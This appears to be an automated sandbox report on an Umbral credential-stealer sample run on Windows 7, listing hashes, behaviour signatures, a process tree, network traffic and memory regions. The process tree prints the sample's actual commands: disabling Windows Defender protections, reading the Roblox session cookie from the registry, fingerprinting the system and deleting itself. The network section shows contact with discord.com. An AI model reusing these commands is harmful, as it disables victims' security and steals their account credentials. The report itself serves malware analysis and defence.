Analysis

  • max time kernel
    117s
  • max time network
    118s
  • platform
    windows7_x64
  • resource
    win7-20240704-en
  • resource tags

    arch:x64, arch:x86, image:win7-20240704-en, locale:en-us, os:windows7-x64, system
  • submitted
    22-08-2024 02:01

General

  • Target

    0bb64c9c095b99117d8250f97cda9a257985ce3ba6b5891796c7ece426b61ed0.exe

  • Size

    227KB

  • MD5

    fe415b65db443f8d7e3aa075d79b4a72

  • SHA1

    71fa4604b053ac55c7afa5a2d87ea0bcf8d0a116

  • SHA256

    0bb64c9c095b99117d8250f97cda9a257985ce3ba6b5891796c7ece426b61ed0

  • SHA512

    dc715d2c938f22446f155afa615adbee775eb7abdc688b204037eccadd435490be3ab0fe6b2a9d493cb357de5730e864ffb842c42dc3051671a7fbc9a9117fb8

  • SSDEEP

    6144:+loZM9rIkd8g+EtXHkv/iD4W9YhFzQEbmCzFQMpi+b8e1mSPi:ooZOL+EP8W9YhFzQEbmCzFQMp9Pa

Malware Config

Signatures

  • Detect Umbral payload 1 IoCs
  • Umbral

    Umbral stealer is an open-source modular stealer written in C#.

  • Credentials from Password Stores: Credentials from Web Browsers 1 TTPs

    Malicious access to, or copying of, a web browser credential store.

  • Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

    Uses the powershell.exe command.

  • Drops file in Drivers directory 1 IoCs
  • Deletes itself 1 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

  • Detects videocard installed 1 TTPs 1 IoCs

    Uses WMIC.exe to determine the installed video card.

  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 5 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 36 IoCs
  • Views/modifies file attributes 1 TTPs 1 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\0bb64c9c095b99117d8250f97cda9a257985ce3ba6b5891796c7ece426b61ed0.exe
    "C:\Users\Admin\AppData\Local\Temp\0bb64c9c095b99117d8250f97cda9a257985ce3ba6b5891796c7ece426b61ed0.exe"
    1⤵
    • Drops file in Drivers directory
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:2664
    • C:\Windows\system32\attrib.exe
      "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\0bb64c9c095b99117d8250f97cda9a257985ce3ba6b5891796c7ece426b61ed0.exe"
      2⤵
      • Views/modifies file attributes
      PID:2740
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\0bb64c9c095b99117d8250f97cda9a257985ce3ba6b5891796c7ece426b61ed0.exe'
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2200
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2568
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:692
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2856
    • C:\Windows\System32\Wbem\wmic.exe
      "wmic.exe" os get Caption
      2⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:1184
    • C:\Windows\System32\Wbem\wmic.exe
      "wmic.exe" computersystem get totalphysicalmemory
      2⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:1672
    • C:\Windows\System32\Wbem\wmic.exe
      "wmic.exe" csproduct get uuid
      2⤵
      PID:1920
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      PID:2848
    • C:\Windows\System32\Wbem\wmic.exe
      "wmic" path win32_VideoController get name
      2⤵
      • Detects videocard installed
      PID:852
    • C:\Windows\system32\cmd.exe
      "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\0bb64c9c095b99117d8250f97cda9a257985ce3ba6b5891796c7ece426b61ed0.exe" && pause
      2⤵
      • Deletes itself
      • System Network Configuration Discovery: Internet Connection Discovery
      • Suspicious use of WriteProcessMemory
      PID:2928
      • C:\Windows\system32\PING.EXE
        ping localhost
        3⤵
        • System Network Configuration Discovery: Internet Connection Discovery
        • Runs ping.exe
        PID:3040

Network

  • DNS (flag: US) gstatic.com
    Process: 0bb64c9c095b99117d8250f97cda9a257985ce3ba6b5891796c7ece426b61ed0.exe
    Remote address: 8.8.8.8:53
    Request: gstatic.com IN A
    Response: gstatic.com IN A 216.58.214.67
  • GET (flag: FR) https://gstatic.com/generate_204
    Process: 0bb64c9c095b99117d8250f97cda9a257985ce3ba6b5891796c7ece426b61ed0.exe
    Remote address: 216.58.214.67:443
    Request:
      GET /generate_204 HTTP/1.1
      Host: gstatic.com
      Connection: Keep-Alive
    Response:
      HTTP/1.1 204 No Content
      Content-Length: 0
      Cross-Origin-Resource-Policy: cross-origin
      Date: Thu, 22 Aug 2024 02:01:12 GMT
      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
  • DNS (flag: US) ip-api.com
    Process: 0bb64c9c095b99117d8250f97cda9a257985ce3ba6b5891796c7ece426b61ed0.exe
    Remote address: 8.8.8.8:53
    Request: ip-api.com IN A
    Response: ip-api.com IN A 208.95.112.1
  • GET (flag: US) http://ip-api.com/json/?fields=225545
    Process: 0bb64c9c095b99117d8250f97cda9a257985ce3ba6b5891796c7ece426b61ed0.exe
    Remote address: 208.95.112.1:80
    Request:
      GET /json/?fields=225545 HTTP/1.1
      Host: ip-api.com
      Connection: Keep-Alive
    Response:
      HTTP/1.1 200 OK
      Date: Thu, 22 Aug 2024 02:01:14 GMT
      Content-Type: application/json; charset=utf-8
      Content-Length: 161
      Access-Control-Allow-Origin: *
      X-Ttl: 60
      X-Rl: 44
  • DNS (flag: US) discord.com
    Process: 0bb64c9c095b99117d8250f97cda9a257985ce3ba6b5891796c7ece426b61ed0.exe
    Remote address: 8.8.8.8:53
    Request: discord.com IN A
    Response: discord.com IN A 162.159.128.233, 162.159.136.232, 162.159.135.232, 162.159.138.232, 162.159.137.232
  • 216.58.214.67:443
    https://gstatic.com/generate_204
    Protocols: tls, http
    Process: 0bb64c9c095b99117d8250f97cda9a257985ce3ba6b5891796c7ece426b61ed0.exe
    862 B, 4.7kB, 11, 8
    HTTP Request: GET https://gstatic.com/generate_204
    HTTP Response: 204
  • 208.95.112.1:80
    http://ip-api.com/json/?fields=225545
    Protocols: http
    Process: 0bb64c9c095b99117d8250f97cda9a257985ce3ba6b5891796c7ece426b61ed0.exe
    309 B, 510 B, 5, 4
    HTTP Request: GET http://ip-api.com/json/?fields=225545
    HTTP Response: 200
  • 162.159.128.233:443
    discord.com
    Protocols: tls
    Process: 0bb64c9c095b99117d8250f97cda9a257985ce3ba6b5891796c7ece426b61ed0.exe
    345 B, 219 B, 5, 5
  • 8.8.8.8:53
    gstatic.com
    Protocols: dns
    Process: 0bb64c9c095b99117d8250f97cda9a257985ce3ba6b5891796c7ece426b61ed0.exe
    57 B, 73 B, 1, 1
    DNS Request: gstatic.com
    DNS Response: 216.58.214.67
  • 8.8.8.8:53
    ip-api.com
    Protocols: dns
    Process: 0bb64c9c095b99117d8250f97cda9a257985ce3ba6b5891796c7ece426b61ed0.exe
    56 B, 72 B, 1, 1
    DNS Request: ip-api.com
    DNS Response: 208.95.112.1
  • 8.8.8.8:53
    discord.com
    Protocols: dns
    Process: 0bb64c9c095b99117d8250f97cda9a257985ce3ba6b5891796c7ece426b61ed0.exe
    57 B, 137 B, 1, 1
    DNS Request: discord.com
    DNS Response: 162.159.128.233, 162.159.136.232, 162.159.135.232, 162.159.138.232, 162.159.137.232

MITRE ATT&CK Enterprise v15

Downloads

    • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

      Filesize

      7KB

      MD5

      a46df4d585e57a4ffe9b49434689754e

      SHA1

      5e894d21610605ec909cc9dc4b82de89ec673228

      SHA256

      333b13d1466ebfb8e4a4806052ebe2b5aab1c6f2c7f31f7373c329c008efae9c

      SHA512

      aff2c4d56fcd124ff6c2381cfbde9d4ddb00ae4d447eca844c8049945a21634960981b9c4068de202e5c2c342748f7c9b65566c1f928fcd16c418370480b0224

    • memory/2200-8-0x000000001B7D0000-0x000000001BAB2000-memory.dmp

      Filesize

      2.9MB

    • memory/2200-11-0x000007FEED640000-0x000007FEEDFDD000-memory.dmp

      Filesize

      9.6MB

    • memory/2200-7-0x000007FEED8FE000-0x000007FEED8FF000-memory.dmp

      Filesize

      4KB

    • memory/2200-15-0x000007FEED640000-0x000007FEEDFDD000-memory.dmp

      Filesize

      9.6MB

    • memory/2200-13-0x000007FEED640000-0x000007FEEDFDD000-memory.dmp

      Filesize

      9.6MB

    • memory/2200-10-0x000007FEED640000-0x000007FEEDFDD000-memory.dmp

      Filesize

      9.6MB

    • memory/2200-14-0x000007FEED640000-0x000007FEEDFDD000-memory.dmp

      Filesize

      9.6MB

    • memory/2200-12-0x000007FEED640000-0x000007FEEDFDD000-memory.dmp

      Filesize

      9.6MB

    • memory/2200-9-0x0000000001E70000-0x0000000001E78000-memory.dmp

      Filesize

      32KB

    • memory/2568-21-0x000000001B5F0000-0x000000001B8D2000-memory.dmp

      Filesize

      2.9MB

    • memory/2568-22-0x0000000001E10000-0x0000000001E18000-memory.dmp

      Filesize

      32KB

    • memory/2664-2-0x000007FEF5D20000-0x000007FEF670C000-memory.dmp

      Filesize

      9.9MB

    • memory/2664-0-0x000007FEF5D23000-0x000007FEF5D24000-memory.dmp

      Filesize

      4KB

    • memory/2664-1-0x0000000000DC0000-0x0000000000E00000-memory.dmp

      Filesize

      256KB

    • memory/2664-53-0x000007FEF5D20000-0x000007FEF670C000-memory.dmp

      Filesize

      9.9MB

    • memory/2848-49-0x000000001B5C0000-0x000000001B8A2000-memory.dmp

      Filesize

      2.9MB
